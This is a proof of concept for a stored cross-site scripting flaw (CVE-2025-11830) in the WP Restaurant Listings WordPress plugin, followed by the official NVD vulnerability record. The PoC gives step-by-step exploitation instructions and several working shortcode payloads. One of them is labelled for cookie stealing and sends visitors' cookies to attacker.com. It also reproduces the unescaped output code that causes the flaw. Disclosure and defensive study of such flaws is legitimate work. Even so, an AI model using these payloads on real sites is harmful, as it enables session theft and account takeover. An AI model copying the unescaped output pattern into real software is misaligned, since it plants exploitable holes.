CVE-2025-11830

<!-- CVE-2025-11830 PoC - Stored XSS via restaurant_summary shortcode 'align' parameter Target: WP Restaurant Listings plugin <= 1.0.2 Requirement: Contributor-level access or above --> <!-- Step 1: Authenticate as a contributor-level user --> <!-- Step 2: Create a new post or page --> <!-- Step 3: Insert the following shortcode into the post content --> [restaurant_summary align="><script>alert(document.cookie)</script>" id="1"] <!-- Alternative payloads for cookie stealing or further exploitation: --> [restaurant_summary align='" onmouseover="alert(1)' id="1"] [restaurant_summary align="><img src=x onerror=alert(document.domain)>" id="1"] [restaurant_summary align="><svg onload=fetch('https://attacker.com/steal?c='+document.cookie)>" id="1"] <!-- Step 4: Publish the post Step 5: When any user (including admins) views the post, the injected JavaScript executes in their browser context. --> <?php // Example of vulnerable code pattern (simplified from shortcodes.php ~line 511): /* function restaurant_summary_shortcode( $atts ) { $atts = shortcode_atts( array( 'id' => '', 'align' => 'left', // <-- 'align' parameter is not sanitized ), $atts, 'restaurant_summary' ); // VULNERABLE: Direct output without escaping $output = '<div class="restaurant-summary" align="' . $atts['align'] . '">'; $output .= get_restaurant_summary( $atts['id'] ); $output .= '</div>'; return $output; } */ ?>

{"cve": {"id": "CVE-2025-11830", "sourceIdentifier": "[email protected]", "published": "2025-10-22T09:15:34.563", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Restaurant Listings plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'align' parameter of the restaurant_summary shortcode in all versions up to, and including, 1.0.2. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-restaurant-listings/tags/1.0.2/includes/class-wp-restaurant-listings-shortcodes.php#L511", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/572b584e-b580-4d90-88b6-ee5b25678d9b?source=cve", "source": "[email protected]"}]}}